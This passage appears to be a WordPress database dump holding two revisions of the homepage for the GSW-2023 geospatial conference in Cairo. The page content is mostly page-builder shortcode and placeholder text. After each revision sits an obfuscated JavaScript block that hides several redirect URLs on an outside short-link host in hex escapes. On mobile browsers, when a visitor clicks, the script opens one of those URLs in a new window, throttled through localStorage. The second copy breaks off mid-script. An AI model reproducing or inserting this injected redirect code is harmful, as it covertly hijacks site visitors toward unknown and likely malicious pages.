tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 14:48:55','2022-11-09 14:48:55','',3066,'https://gsw2023.com/?p=3119',0,'revision','',0),
(3120,1,'2022-11-09 14:49:41','2022-11-09 14:49:41','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h3>EGYPT GSW\'2023</h3>\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa</p>\n<p>aaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge 